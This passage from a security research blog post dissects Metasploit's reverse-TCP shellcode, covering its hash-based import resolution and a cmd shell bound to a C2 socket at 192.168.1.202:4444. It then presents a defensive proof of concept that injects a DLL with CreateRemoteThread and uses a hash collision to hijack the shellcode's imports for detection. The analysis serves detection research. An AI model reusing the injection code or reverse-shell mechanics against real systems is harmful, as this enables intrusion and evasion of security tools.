"C:\Windows\SysWOW64\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"

As can be observed above, the first import resolved and called by the shellcode is LoadLibraryA, exported by the 32- and 64-bit kernel32.dll.
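
As a quick sanity check, the constant from figure 2 can be reproduced by reusing the get_hash and upper helpers from the rainbow-table script:

# DllHash("KERNEL32.DLL") plus ExportHash("LoadLibraryA") should reproduce the
# hash pushed before the first call ebp in figure 2.
dll_hash = get_hash(upper('KERNEL32.DLL\0'.encode('UTF-16-LE')))  # 0x92af16da
exp_hash = get_hash(b'LoadLibraryA\0')                            # case preserved
print(hex((dll_hash + exp_hash) & 0xffffffff))                    # 0x726774c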

Execution Flow Analysis

With the import resolution sorted out, understanding the remaining code becomes a lot easier. As we can see in figure 15, the shellcode starts by performing the following calls:

  1. LoadLibraryA at ㉗ to ensure the ws2_32 library is loaded. If not yet loaded, this will map the ws2_32.dll DLL in memory, enabling the shellcode to further resolve additional functions related to the Windows Sockets 2 technology.
  2. WSAStartup at ㉘ to initiate the usage of sockets within the shellcode’s process.
  3. WSASocketA at ㉙ to create a new socket. This one will be a stream-based (SOCK_STREAM) socket over IPv4 (AF_INET).
Figure 15: Disassembly of the socket initialization.

Once the socket is created, the shellcode proceeds to call the connect function at ㉝ with the sockaddr_in structure previously pushed on the stack (㉜). The sockaddr_in structure contains valuable information from an incident response perspective such as the protocol (0x0200 being AF_INET, a.k.a. IPv4, in little endianness), the port (0x115c being the default 4444 Metasploit port in big endianness) as well as the C2 IPv4 address at ㉛ (0xc0a801ca being 192.168.1.202 in big endianness).
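
These fields can be decoded with a few lines of Python, confirming the endianness of each value (the raw bytes below are the first eight bytes of the sockaddr_in as laid out in memory by our sample):

import ipaddress
import struct

# 02 00 (AF_INET, little endian) | 11 5c (port, big endian) | c0 a8 01 ca (IPv4)
raw = bytes.fromhex('02 00 11 5c c0 a8 01 ca')

family = struct.unpack_from('<H', raw, 0)[0]  # 2 -> AF_INET
port   = struct.unpack_from('>H', raw, 2)[0]  # 0x115c -> 4444
c2     = ipaddress.IPv4Address(raw[4:8])      # network byte order

print(family, port, c2)  # 2 4444 192.168.1.202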

If the connection fails, the shellcode retries up to 5 times (decrementing at ㉞ the counter defined at ㉚) after which it will abort execution using ExitProcess (㉟).

Figure 16: Disassembly of the socket connection.

If the connection succeeds, the shellcode will create a new cmd process and connect all of its Standard Error, Output and Input (㊱) to the established C2 socket. The process itself is started through a CreateProcessA call at ㊲.

Figure 17: Execution of the reverse-shell.

Finally, while the process is running, the shellcode performs the following operations:

  1. Wait indefinitely at ㊳ for the remote shell to terminate by calling WaitForSingleObject.
  2. Once terminated, identify the Windows operating system version at ㊴ using GetVersion and exit at ㊵ using either ExitProcess or RtlExitUserThread.
Figure 18: Termination of the shellcode.

Overall, the execution flow of Metasploit’s windows/shell_reverse_tcp shellcode can be schematized as follows:

Figure 19: Metasploit’s TCP reverse-shell execution flow.

Shellcode Disruption

With the execution flow analysis squared away, let’s see how we can turn the tables on the shellcode and disrupt it. From an attacker’s perspective, the shellcode itself is considered trusted while the environment it runs in is hostile. This section will build upon the assumption that we don’t know where shellcode is executing in memory and, as such, hooking/modifying the shellcode itself is not an acceptable solution.

In this section we will first focus on the theoretical aspects before covering a proof-of-concept implementation.

The Weaknesses

CWE-1288: Improper Validation of Consistency within Input

The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.

cwe.mitre.org

From the shellcode’s perspective, only two external interactions provide a possible attack surface. The first and most obvious surface is the C2 channel, where some security solutions can detect or impair either the communications protocol or the surrounding API calls. This attack surface however comes with the massive caveat that security solutions have to distinguish legitimate from malicious behavior, possibly resulting in medium/low-confidence detections.

A second less obvious attack surface is the import resolution itself which, from the shellcode’s perspective, relies on external process data. Within this import resolution routine, we observed how the shellcode relied on the BaseDllName property to generate a hash for each module.

Figure 20: The hashing routine retrieving both Buffer and MaximumLength to hash a module’s BaseDllName.

While the module’s exports were UTF-8 NULL-terminated strings, the BaseDllName property was a UNICODE_STRING structure. This structure contains multiple properties:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

Length: The length, in bytes, of the string stored in Buffer.

MaximumLength: The length, in bytes, of Buffer.

Buffer: Pointer to a buffer used to contain a string of wide characters.

[…]

If the string is null-terminated, Length does not include the trailing null character.

The MaximumLength is used to indicate the length of Buffer so that if the string is passed to a conversion routine such as RtlAnsiStringToUnicodeString the returned string does not exceed the buffer size.

docs.microsoft.com

While not explicitly mentioned in the above documentation, we can implicitly understand that the buffer’s MaximumLength property is unrelated to the actual string’s Length property. The Unicode string does not need to consume the entire Buffer, nor is it guaranteed to be NULL-terminated. Theoretically, the Windows API should only consider the first Length bytes of the Buffer for comparison, ignoring any bytes between the Length and MaximumLength positions. Increasing a UNICODE_STRING‘s buffer (Buffer and MaximumLength) should not impact functions relying on the stored string.

As the shellcode’s hashing routine relies on the buffer’s MaximumLength, similar strings within differently-sized buffers will generate different hashes. This flaw in the hashing routine can be leveraged to neutralize potential Metasploit shellcode. From a technical perspective, as security solutions already hook process creation and inject themselves, interfering with the hashing routine without knowledge of its existence or location can be achieved by increasing the BaseDllName buffer for modules required by Metasploit (e.g.: kernel32.dll).
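
The impact of such a resize can be verified with the get_hash and upper helpers from the rainbow-table script: growing the buffer by a single wide character (two NULL bytes in this illustration) already yields a different hash:

# Same string, two differently-sized buffers, two different Metasploit hashes.
original = 'KERNEL32.DLL'.encode('UTF-16-LE') + b'\x00\x00'  # MaximumLength 0x1A
resized  = original + b'\x00\x00'                            # buffer grown by one wchar

print(hex(get_hash(upper(original))))  # 0x92af16da, the hash Metasploit expects
print(hex(get_hash(upper(resized))))   # a different value: no module ever matches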

This hash-input validation flaw is what we will leverage next as initial vector to cause a Denial of Service as well as an Execution Flow Hijack.

CWE-823: Use of Out-of-range Pointer Offset

The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.

cwe.mitre.org

One observation we made earlier is that the shellcode loops through modules indefinitely until a matching export is found. Since we found a flaw that lets us alter hashes, let us analyze what happens if all hashes fail to match.

While walking the double-linked list could loop indefinitely, the shellcode will actually generate an “Access Violation” error once all modules have been checked. This exception is not generated explicitly by the shellcode but rather occurs as the code doesn’t verify the list’s boundaries. Given that for each item in the list the BaseDllName.Buffer pointer is loaded from offset 0x28, an exception will occur once we access the first non-LDR_DATA_TABLE_ENTRY item in the list. As shown in the figure below, this will be the case once the shellcode loops back to the first PEB_LDR_DATA structure, at which stage an out-of-bounds read will occur resulting in an invalid pointer being de-referenced.

Figure 21: An out-of-bounds read when walking the InMemoryOrderModuleList double-linked list.

Although from a defensive perspective causing a Denial of Service is better than having Metasploit shellcode execute, let’s see how one could further exploit the above flaw to the defender’s advantage.

Abusing CWE-1288 to Hijack the Execution Flow

One module of interest is kernel32.dll which, as previously analyzed in the “Execution Flow Analysis” section, is the first required module in order to call the LoadLibraryA function. During the hashing routine, the kernel32.dll hash is computed to be 0x92af16da. By applying the above buffer-resize technique, we can ensure the shellcode loops additional modules since the original hashes won’t match. From here, a security solution has a couple of options:

  • Our injected security solution’s DLL could be named kernel32.dll. While its hashes would match, having two modules named kernel32.dll might have unintended consequences on legitimate calls to LoadLibraryA.
  • Similarly, as we are already modifying buffers in LDR_DATA_TABLE_ENTRY structures, we could easily save the original values of the kernel32.dll buffer and assign them to our security solution’s injected module. While this would theoretically work, having a second buffer in memory called kernel32.dll isn’t a great idea as previously mentioned.
  • Alternatively, our security solution’s injected module could have a different name, as long as there is a hash-collision with the original hash. This technique won’t impact legitimate calls such as LoadLibraryA as these rely on value-based comparisons, as opposed to the shellcode’s hash-based comparisons.

We previously observed how the Metasploit shellcode performed hashing using additions and rotations on ASCII characters (1-byte). As a follow-up on figure 6, the following schema depicts the state of KERNEL32.DLL‘s hash on the third loop, where the ASCII characters K and E overlap. As one might observe, the NULL character is a direct consequence of performing 1-byte operations on what initially is a Unicode string (2-byte).

Figure 22: The first and third ASCII characters overlapping.

To obtain a hash collision, we need to identify changes which we can perform on the initial KERNEL32.DLL string without altering the resulting hash. The following figure highlights how there is a 6-bit relationship between the first and third ASCII character. By subtracting the second bit of the first character, we can increment the eighth bit (2+6) of the third character without affecting the resulting hash.

Figure 23: A hash collision between the first and third ASCII characters.

While the above collision is not practical (the ASCII or Unicode character 0xC5 is not within the alphanumeric range), we can apply the same principle to identify acceptable relationships. The following Python snippet brute-forces the relationships among Unicode characters for the KERNEL32.DLL string assuming we don’t alter the string’s length.

name = "KERNEL32.DLL\0"
for i in range(len(name)):
    for j in range(len(name)):
        # Avoid duplicates
        if j <= i:
            continue
        # Compute right-shift/left-shift relationships
        # We shift twice by 13 bits due to Unicode being twice the size of ASCII.
        # We perform a modulo of 32 due to the registers being, in our case, 32 bits in size.
        relation = ((13*2*(j-i))%32)
        if relation > 16:
            relation -= 32
        # Get close relationships (0, 1, 2 or 3 bit-shifts)
        if -3 <= relation <= 3:
            print(f"Characters at index {i} and {j:2d} have a relationship of {relation} bits")
# "Characters at index 0 and  5 have a relationship of 2 bits"
# "Characters at index 0 and 11 have a relationship of -2 bits"
# "Characters at index 1 and  6 have a relationship of 2 bits"
# "Characters at index 1 and 12 have a relationship of -2 bits"
# "Characters at index 2 and  7 have a relationship of 2 bits"
# "Characters at index 3 and  8 have a relationship of 2 bits"
# "Characters at index 4 and  9 have a relationship of 2 bits"
# "Characters at index 5 and 10 have a relationship of 2 bits"
# "Characters at index 6 and 11 have a relationship of 2 bits"
# "Characters at index 7 and 12 have a relationship of 2 bits"

As observed above, multiple character pairs can be altered to cause a hash collision. As an example, there is a 2-bit left-shift relation between the characters at Unicode position 0 and 11.

Given that a 2-bit left-shift is equivalent to a multiplication by 4, incrementing the Unicode character at position 0 by any value requires decrementing the character at position 11 by 4 times that value to keep the Metasploit hash intact. The following Python commands highlight the different possible combinations between these two characters for KERNEL32.DLL.

# The original hash (0x92af16da)
print(hex(get_hash(upper('KERNEL32.DLL\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 3 requires adding 12 to 'L'
print(hex(get_hash(upper('HERNEL32.DLX\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 2 requires adding 8 to 'L'
print(hex(get_hash(upper('IERNEL32.DLT\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 1 requires adding 4 to 'L'
print(hex(get_hash(upper('JERNEL32.DLP\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Incrementing 'K' by 1 requires subtracting 4 from 'L'
print(hex(get_hash(upper('LERNEL32.DLH\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Incrementing 'K' by 2 requires subtracting 8 from 'L'
print(hex(get_hash(upper('MERNEL32.DLD\0'.encode('UTF-16-LE')))))
# "0x92af16da"

This hash collision combined with the buffer-resize technique can be chained to ensure our custom DLL gets evaluated as KERNEL32.DLL in the hashing routine. From here, if we export a LoadLibraryA function, the Metasploit import resolution will incorrectly call our implementation resulting in an execution flow hijack. This hijack can be leveraged to signal the security solution about a high-confidence Metasploit import resolution taking place.

Building a Proof of Concept

To demonstrate our theory, let’s build a proof-of-concept DLL which will, once loaded, make use of CWE-1288 to simulate how an EDR (Endpoint Detection and Response) solution could detect Metasploit without prior knowledge of its in-memory location. As we want to exploit the above hash collisions, our DLL will be named hernel32.dlx.

The proof of concept has been published on NVISO’s GitHub repository.

The Process Injection

To simulate how a security solution would be injected into most processes, let’s build a simple function which will run our DLL into a process of our choosing.

The Inject function will trick the targeted process into loading a specific DLL (our hernel32.dlx) and execute its DllMain function from where we’ll trigger the buffer-resizing. While multiple techniques exist, we will simply write our DLL’s path into the target process and create a remote thread calling LoadLibraryA. This remote thread will then load our DLL as if the target process intended to do it.

METASPLOP_API
void
Inject(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    #pragma EXPORT
    int PID;
    HMODULE hKernel32;
    FARPROC fLoadLibraryA;
    HANDLE hProcess;
    LPVOID lpInject;

    // Recover the current module path
    char payload[MAX_PATH];
    int size;
    if ((size = GetModuleFileNameA(hPayload, payload, MAX_PATH)) == NULL)
    {
        MessageBoxError("Unable to get module file name.");
        return;
    }
    
    // Recover LoadLibraryA 
    hKernel32 = GetModuleHandle(L"Kernel32");
    if (hKernel32 == NULL)
    {
        MessageBoxError("Unable to get a handle to Kernel32.");
        return;
    }
    fLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
    if (fLoadLibraryA == NULL)
    {
        MessageBoxError("Unable to get LoadLibraryA address.");
        return;
    }

    // Open the processes
    PID = std::stoi(lpszCmdLine);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (!hProcess)
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to open process %d.", PID) > 0)
        {
            MessageBoxError(message);
        }
        return;
    }

    // Allocate memory for the injection
    lpInject = VirtualAllocEx(hProcess, NULL, size + 1, MEM_COMMIT, PAGE_READWRITE);
    if (lpInject)
    {
        wchar_t buffer[100];
        wsprintfW(buffer, L"You are about to execute the injected library in process %d.", PID);
        if (WriteProcessMemory(hProcess, lpInject, payload, size + 1, NULL) && IDCANCEL != MessageBox(NULL, buffer, L"NVISO Mock AV", MB_ICONINFORMATION | MB_OKCANCEL))
        {
            CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)fLoadLibraryA, lpInject, NULL, NULL);
        }
        else
        {
            VirtualFreeEx(hProcess, lpInject, NULL, MEM_RELEASE);
        }
    }
    else
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to allocate %d bytes.", size+1) > 0)
        {
            MessageBoxError(message);
        }
    }
    CloseHandle(hProcess);
    return;
}

As one might notice, the above code relies on the hPayload variable. This variable will be defined in the DllMain function as we aim to get the current DLL’s module regardless of its name, whereas GetModuleHandleA would require us to hard-code the hernel32.dlx name.

HMODULE hPayload;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

With our Inject method exported, we can now proceed to build the logic needed to trigger CWE-1288.

The Buffer-Resizing

Resizing the BaseDllName buffer from the kernel32.dll module can be accomplished using the logic below. Similar to the shellcode’s technique, we will recover the PEB, walk the InMemoryOrderModuleList and once the KERNEL32.DLL module is found, increase its buffer by 1.

void
Metasplop() {
    PPEB pPeb = NULL;
    PPEB_LDR_DATA pLdrData = NULL;
    PLIST_ENTRY pHeadEntry = NULL;
    PLIST_ENTRY pEntry = NULL;
    PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
    USHORT MaximumLength = NULL;

    // Read the PEB from the current process
    if ((pPeb = GetCurrentPebProcess()) == NULL) {
        MessageBoxError("GetPebCurrentProcess failed.");
        return;
    }

    // Get the InMemoryOrderModuleList
    pLdrData = pPeb->Ldr;
    pHeadEntry = &pLdrData->InMemoryOrderModuleList;

    // Loop the modules
    for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink) {
        pLdrEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderModuleList);
        // Skip modules which aren't kernel32.dll
        if (lstrcmpiW(pLdrEntry->BaseDllName.Buffer, L"KERNEL32.DLL")) continue;
        // Compute the new maximum length
        MaximumLength = pLdrEntry->BaseDllName.MaximumLength + 1;
        // Create a new increased buffer
        wchar_t* NewBuffer = new wchar_t[MaximumLength];
        wcscpy_s(NewBuffer, MaximumLength, pLdrEntry->BaseDllName.Buffer);
        // Update the BaseDllName
        pLdrEntry->BaseDllName.Buffer = NewBuffer;
        pLdrEntry->BaseDllName.MaximumLength = MaximumLength;
        break;
    }
    return;
}

This logic is best triggered as soon as possible once injection has occurred. While this could be done through a TLS hook, we will for simplicity update the existing DllMain function to invoke Metasplop on DLL_PROCESS_ATTACH.

HMODULE hPayload;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        Metasplop();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

The Signal

As the shellcode we analyzed relied on LoadLibraryA, let’s build an implementation which will simply raise the Metasploit alert and then terminate the current malicious process. The following function will only be triggered by the shellcode and is itself never called from within our DLL.

_Ret_maybenull_
HMODULE
WINAPI
LoadLibraryA(_In_ LPCSTR lpLibFileName)
{
    #pragma EXPORT
    // Raise the error message
    char buffer[200];
    if (sprintf_s(buffer, 200, "The process %d has attempted to load \"%s\" through LoadLibraryA using Metasploit's dynamic import resolution.\n", GetCurrentProcessId(), lpLibFileName) > 0)
    {
        MessageBoxError(buffer);
    }
    // Exit the process
    ExitProcess(-1);
}

The above approach can be performed for other variations such as LoadLibraryW, LoadLibraryExA and others.

The Result

With our emulated security solution ready, we can proceed to demonstrate our technique. As such, we’ll start by executing Shellcode.exe, a simple shellcode loader (shown on the left in figure 24). This shellcode loader prints its process ID (which we’ll target for injection) and then waits for the path of the shellcode it needs to execute.

Once we know in which process the shellcode will run, we can inject our emulated security solution (shown on the right in figure 24). This process is typically performed by the security solution for each process and is merely done manually in our PoC for simplicity. Using our custom DLL, we can inject into the desired process using the following command where the path to hernel32.dlx and the process ID have been picked accordingly.

# rundll32.exe <dll_path>,Inject <target_pid>
rundll32.exe C:\path\to\hernel32.dlx,Inject 6780
Figure 24: Manually emulating the AV injection into the future malicious process.

Once the injection is performed, the Shellcode.exe process has been staged (module buffer resized, colliding DLL loaded) for exploitation of the CWE-1288 weakness should any Metasploit shellcode run. It is worth noting that at this stage, no shellcode has been loaded nor has there been any memory allocation for it. This ensures we comply with the assumption that we don’t know where shellcode is executing.

With our mock security solution injected, we can proceed to provide the path to our initially generated shellcode (shellcode.vir in our case) to the soon-to-be malicious Shellcode.exe process (left in figure 25).

Figure 25: Executing the malicious shellcode as would be done by the stagers.

Once the shellcode runs, we can see in figure 26 how our LoadLibraryA signalling function gets called, resulting in a high-confidence detection of shellcode-based import resolution.

Figure 26: The input-validation flaw and hash collision being chained to signal the AV.

Disclosure

As a matter of courtesy, NVISO delayed the publishing of this blog post to provide Rapid7, the maintainers of Metasploit, with sufficient review time.

Conclusion

This blog post highlighted the anatomy of Metasploit shellcode with an additional focus on the dynamic import resolution. Within this dynamic import resolution we further identified two weaknesses, one of which can be leveraged to identify runtime Metasploit shellcode with high confidence.

At NVISO, we are always looking at ways to improve our detection mechanisms. Understanding how Metasploit works is one part of the bigger picture and as a result of this research, we were able to build Yara rules identifying Metasploit payloads by fingerprinting both import hashes and average distances between them. A subset of these rules is available upon request.
